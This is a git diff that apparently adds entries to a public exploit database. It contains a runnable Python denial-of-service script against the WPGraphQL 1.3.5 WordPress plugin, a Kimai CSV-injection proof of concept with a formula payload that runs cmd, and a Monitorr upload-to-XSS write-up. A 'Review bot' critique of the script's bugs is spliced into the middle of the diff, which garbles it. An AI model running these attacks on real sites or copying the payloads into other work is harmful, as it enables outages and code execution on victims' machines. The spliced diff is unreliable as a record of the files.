diff --git a/exploits/php/dos/49807.py b/exploits/php/dos/49807.py
new file mode 100755
index 000000000..b858f62bc
--- /dev/null
+++ b/exploits/php/dos/49807.py
@@ -0,0 +1,55 @@
+# Exploit Title: WordPress Plugin WPGraphQL 1.3.5 - Denial of Service
+# Author: Dolev Farhi
+# Date: 2021-04-12
+# Vendor Homepage: https://www.wpgraphql.com/
+# Version: 1.3.5
+# Tested on: Ubuntu
+
+ """
+ This attack uses duplication of fields amplified by GraphQL batched queries, resulting in server OOM and MySQL connection errors.
+ """
+
+import sys
+import requests
+
+
+def usage():
+ print('* WordPress GraphQL 1.3.5 Denial of Service *')
+ print('python {} '.format(sys.argv[0]))
+ print('python {} http://site.com 10000 100'.format(sys.argv[0]))
+ sys.exit(1)
+
+if len(sys.argv) < 4:
+ print('Missing arguments!')
+ usage()
+
+def wpgql_exists():
+ try:
+ r = requests.post(WORDPRESS_URL, json='x')
+ if 'GraphQL' in r.json()['errors'][0]['message']:
+ return True
+ except:
+ pass
+ return False
+
+# This PoC assumes graphql is located at index.php?graphql
+WORDPRESS_URL = sys.argv[1] + '/index.php?graphql'
+FORCE_MULTIPLIER = int(sys.argv[2])
+CHAINED_REQUESTS = int(sys.argv[3])
+
+if wpgql_exists is False:
+ print('Could not identify GraphQL running at "/index.php?graphql"')
+ sys.exit(1)
+
+queries = []
+
+payload = 'content \n comments { \n nodes { \n content } }' * FORCE_MULTIPLIER
+query = {'query':'query { \n posts { \n nodes { \n ' + payload + '} } }'}
+
+for _ in range(0, CHAINED_REQUESTS):
+ queries.append(query)
+
+r = requests.post(WORDPRESS_URL, json=queries)
+print('Time took: {} seconds '.format(r.elapsed.total_seconds()))
+print('Response:', r.json())
\ No newline at end of file
diff --git a/exploits/php/webapps/49805.txt b/exploits/php/webapps/49805.txt
new file mode 100644
index 000000000..5e0ae8095
--- /dev/null
+++ b/exploits/php/webapps/49805.txt
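Review bot: `if wpgql_exists is False:` compares the function object itself to `False`, which is never true, so the endpoint check is skipped and the script proceeds without ever having called it; it should be `if not wpgql_exists():`. The bare `except: pass` inside `wpgql_exists` also folds connection failures, non-JSON bodies and missing keys into the same `False`, so a wrong base URL is indistinguishable from a missing endpoint; narrowing it to `except (requests.RequestException, ValueError, KeyError, IndexError, TypeError):` keeps the intent without masking unrelated errors. The usage line `print('python {} '.format(sys.argv[0]))` appears to have lost its argument placeholders, presumably angle-bracketed text stripped during rendering, so the shown usage text may not match the committed file.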
@@ -0,0 +1,20 @@
+# Exploit Title: Kimai 1.14 - CSV Injection
+# Date: 26/04/2021
+# Exploit Author: Mohammed Aloraimi
+# Vendor Homepage: https://www.kimai.org/
+# Software Link: https://github.com/kevinpapst/kimai2
+# Version: 1.14
+# Payload: @SUM(1+9)*cmd|' /C calc'!A0
+# Tested on: Win10x64
+# Proof Of Concept:
+CSV Injection (aka Excel Macro Injection or Formula Injection) exists in
+creating new timesheet in Kimai. By filling the Description field with malicious
+payload, it will be mistreated while exporting to a CSV file.
+
+To exploit this vulnerability:
+1- Login as user.
+2- Create new timesheet.
+3- Fill the description with the malicious payload.
+4- Save the timesheet.
+5- Export it via CSV.
+6- Open the CSV file, allow all popups and our payload is executed(calculator is opened).
\ No newline at end of file
diff --git a/exploits/php/webapps/49806.txt b/exploits/php/webapps/49806.txt
new file mode 100644
index 000000000..1f8763d8e
--- /dev/null
+++ b/exploits/php/webapps/49806.txt
@@ -0,0 +1,25 @@
+# Exploit Title: Montiorr 1.7.6m - File Upload to XSS
+# Date: 25/4/2021
+# Exploit Author: Ahmad Shakla
+# Software Link: https://github.com/Monitorr/Monitorr
+# Tested on: Kali GNU/Linux 2020.2
+# Detailed Bug Description : https://arabcyberclub.blogspot.com/2021/04/monitor-176m-file-upload-to-xss.html
+
+An attacker can preform an XSS attack via image upload
+
+Steps :
+
+1)Create a payload with the following format :
+>.png
+
+2) Install the database by going to the following link :
+https://monitorr.robyns-petshop.thm/assets/config/_installation/vendor/_install.php
+
+3)Register for a new account on the server by going to the following link :
+https://monitorr.robyns-petshop.thm/assets/config/_installation/vendor/login.php?action=register
+
+4)Login with your credentials on the following link :
+https://monitorr.robyns-petshop.thm/assets/config/_installation/vendor/login.php
+
+5)Go to the following link and upload the payload :
+https://monitorr.robyns-petshop.thm/settings.php#services-configuration
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index 99976167e..fcba2bd35 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -6779,6 +6779,7 @@ id,file,description,date,author,type,platform,port
 49730,exploits/hardware/dos/49730.py,"DD-WRT 45723 - UPNP Buffer Overflow (PoC)",2021-03-31,Enesdex,dos,hardware,
 49773,exploits/multiple/dos/49773.py,"glFTPd 2.11a - Remote Denial of Service",2021-04-15,xynmaps,dos,multiple,
 49789,exploits/multiple/dos/49789.py,"Hasura GraphQL 1.3.3 - Denial of Service",2021-04-21,"Dolev Farhi",dos,multiple,
+49807,exploits/php/dos/49807.py,"WordPress Plugin WPGraphQL 1.3.5 - Denial of Service",2021-04-27,"Dolev Farhi",dos,php,
 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@@ -43976,3 +43977,5 @@ id,file,description,date,author,type,platform,port
 49801,exploits/hardware/webapps/49801.html,"Sipwise C5 NGCP CSC - Click2Dial Cross-Site Request Forgery (CSRF)",2021-04-23,LiquidWorm,webapps,hardware,
 49803,exploits/python/webapps/49803.py,"OpenPLC 3 - Remote Code Execution (Authenticated)",2021-04-26,"Fellipe Oliveira",webapps,python,
 49804,exploits/php/webapps/49804.py,"SEO Panel 4.8.0 - 'order_col' Blind SQL Injection (2)",2021-04-26,nu11secur1ty,webapps,php,
+49805,exploits/php/webapps/49805.txt,"Kimai 1.14 - CSV Injection",2021-04-27,"Mohammed Aloraimi",webapps,php,
+49806,exploits/php/webapps/49806.txt,"Montiorr 1.7.6m - File Upload to XSS",2021-04-27,"Ahmad Shakla",webapps,php,